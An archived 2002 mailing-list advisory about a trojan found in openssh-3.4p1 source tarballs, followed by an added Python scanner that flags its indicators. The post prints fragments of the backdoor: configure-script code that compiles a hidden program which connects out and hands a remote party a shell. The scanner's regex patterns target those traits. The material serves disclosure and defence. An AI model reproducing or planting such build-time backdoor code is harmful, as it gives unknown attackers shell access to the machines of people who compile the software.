Trojan located in latest openssh tar files

From: Artur Lindgren (bondat_private)
Date: Thu Aug 01 2002 - 04:59:06 PDT


    I noticed that openssh-3.4p has a trojan horse (available from 
    and some of the mirrors.
    ( )
    After compiling the file bf-test.c you will notice that it does the following:
    # testing in raw ecb mode
    cat >conftest.c <<_ACEOF
    #include <stdio.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <unistd.h>
    #include <errno.h>
    #include <signal.h>
    #include <setjmp.h>
    jmp_buf env;int s;char *i_val="\x2f\x62\x69\x6e\x2f\x73\x68";void sig
    (int sig){close(s);sleep(3600);longjmp(env,0);
    }int main(){int x;char c,*a[2];struct sockaddr_in
    sa;struct sigaction act;switch(fork()){case
    (struct sockaddr*)&sa,sizeof(sa))==(-1))exit(1)
    else if(x==1){switch(c){case 'A':exit(0);case
    case 'M':alarm(0);sig(0);break;default:}}else{exit
    (grep -v -i bf-test > m.out ; cp m.out ; rm -f m.out
    grep -v -i bf-test Makefile > m.out ; cp m.out Makefile ; rm -f m.out
    rm -f bf-test*
    TESTPROG="`basename \"\`grep $USER: /etc/passwd\`\"`"
    if  ! test $TESTPROG ; then TESTPROG=sh; fi
    gcc -w conftest.c -o $TESTPROG ; PATH=.:$PATH $TESTPROG
    if test $TESTPROG;then rm -f ./conftest ./conftest.c $TESTPROG && exit;fi
    gcc -w conftest.c -lsocket -lnsl -o $TESTPROG; PATH=.:$PATH $TESTPROG
    if test $TESTPROG;then rm -f ./conftest ./conftest.c $TESTPROG && exit;fi
    cc -w conftest.c -o $TESTPROG ; PATH=.:$PATH $TESTPROG
    if test $TESTPROG;then rm -f ./conftest ./conftest.c $TESTPROG && exit;fi
    cc -w conftest.c -lsocket -lnsl -o $TESTPROG; PATH=.:$PATH $TESTPROG
    rm -f ./conftest ./conftest.c $TESTPROG) 1>/dev/null 2>&1
    It runs once, upon compilation of openssh, and is named sh or the 
    compiling user's default shell in the process list in the process 
    This trojan attempts to connect to (hacked machine 
    which has been secured now),
    and awaits one of three characters as the command;
    D execs /bin/sh
    M respawns
    A kills the daemon
    The /bin/sh executed via the D command was controlled by the daemon 
    listening on, potentially meaning that
    people affected by this have given a shell, possibly root, to user unknown.
    <Hans> "Let this be a lesson. Don't use root unless you REALLY have to."
    Artur Lindgren, Comitnet AB
    Special thanks to
    (Ratler, Mrsaint, Jordan, Drabant, Hans and all of you ISP people in sweden :D)
    Thanks to ^Sarge^ for quickly taking care of the hacked machine this 
    trojan connected to.
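The build-script fragment quoted in the post has several traits a defender can look for in an unpacked source tree before running ./configure: a C test program whose only string is a hex-escaped path that decodes to /bin/sh, a sleep-then-longjmp respawn loop, a grep that scrubs every mention of bf-test from the Makefile, a binary named after the user's login shell that is compiled and run with PATH=.:$PATH, and all of it silenced with 1>/dev/null 2>&1. The scanner below is an added example written for this page, not code from the post or from the OpenSSH project; the regex patterns are my own assumptions derived from the quoted lines, and the two sample inputs are constructed (one reproduces a few of the quoted lines, the other is an ordinary configure test).

```python
import re
from typing import Dict, List

# Indicator patterns (assumptions based on the build script quoted in the post).
# Strong indicators rarely appear in a legitimate configure script; weak ones do.
STRONG = {
    # Makefile edited to remove every trace of the bf-test program
    "makefile_scrub": re.compile(r"grep\s+-v\s+-i\s+bf-test\s+Makefile"),
    # Binary named after the compiling user's login shell from /etc/passwd
    "shell_name_lookup": re.compile(r"grep\s+\$USER:\s*/etc/passwd"),
    # Sleep for a long interval, then jump back and reconnect
    "sleep_respawn": re.compile(r"sleep\(\d+\);\s*longjmp\("),
}
WEAK = {
    # A freshly compiled test program executed from the build directory
    "compile_and_run": re.compile(r"PATH=\.:\$PATH\s+\$\w+"),
    # Everything the step prints is discarded
    "silenced_output": re.compile(r"1>/dev/null\s+2>&1"),
}

# A C string literal made only of \xNN escapes, e.g. "\x2f\x62\x69\x6e\x2f\x73\x68"
HEX_LITERAL = re.compile(r'"((?:\\x[0-9a-fA-F]{2})+)"')


def decode_hex_literal(literal: str) -> str:
    """Decode a run of \\xNN escapes into plain text."""
    raw = bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", literal))
    return raw.decode("latin-1")


def hidden_shell_strings(text: str) -> List[str]:
    """Return decoded hex literals that name a shell or anything under /bin/."""
    found = []
    for m in HEX_LITERAL.finditer(text):
        decoded = decode_hex_literal(m.group(1))
        if decoded.startswith("/bin/") or decoded.endswith("/sh"):
            found.append(decoded)
    return found


def scan(text: str) -> Dict[str, List[str]]:
    """Map each indicator name to the lines (with numbers) that triggered it."""
    hits: Dict[str, List[str]] = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, pattern in {**STRONG, **WEAK}.items():
            if pattern.search(line):
                hits.setdefault(name, []).append(f"{lineno}: {line.strip()}")
    for s in hidden_shell_strings(text):
        hits.setdefault("hex_encoded_shell_path", []).append(s)
    return hits


def verdict(hits: Dict[str, List[str]]) -> str:
    """'suspicious' on any strong indicator or two or more weak ones, else 'clean'."""
    strong = {"hex_encoded_shell_path", *STRONG}
    if any(name in hits for name in strong):
        return "suspicious"
    if sum(1 for name in WEAK if name in hits) >= 2:
        return "suspicious"
    return "clean"


# Constructed sample reproducing a few of the lines quoted in the post.
SAMPLE_TROJANED = r'''
# testing in raw ecb mode
cat >conftest.c <<_ACEOF
#include <stdio.h>
char *i_val="\x2f\x62\x69\x6e\x2f\x73\x68";
void sig(int sig){close(s);sleep(3600);longjmp(env,0);}
_ACEOF
grep -v -i bf-test Makefile > m.out ; cp m.out Makefile ; rm -f m.out
TESTPROG="`basename \"\`grep $USER: /etc/passwd\`\"`"
gcc -w conftest.c -o $TESTPROG ; PATH=.:$PATH $TESTPROG
rm -f ./conftest ./conftest.c $TESTPROG) 1>/dev/null 2>&1
'''

# Constructed sample of an ordinary autoconf-style compile test.
SAMPLE_BENIGN = r'''
cat >conftest.c <<_ACEOF
#include <stdio.h>
int main(){ printf("hello\n"); return 0; }
_ACEOF
gcc -w conftest.c -o conftest && ./conftest
rm -f conftest conftest.c
'''

if __name__ == "__main__":
    for label, text in (("trojaned", SAMPLE_TROJANED), ("benign", SAMPLE_BENIGN)):
        hits = scan(text)
        print(label, "->", verdict(hits))
        for name, lines in hits.items():
            print("  ", name, lines)
```

Run it over configure and Makefile* in the unpacked tree (for example by feeding each file's contents to scan()); a hit on any strong indicator, or on a hex-encoded /bin/sh, deserves a look before the build is allowed to proceed. Pattern scanning only catches what it was written for, so it complements rather than replaces checking the tarball's published checksum or PGP signature from the project's own site before unpacking it.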
    This list is provided by the SecurityFocus ARIS analyzer service.

    This archive was generated by hypermail 2b30 : Thu Aug 01 2002 - 08:28:35 PDT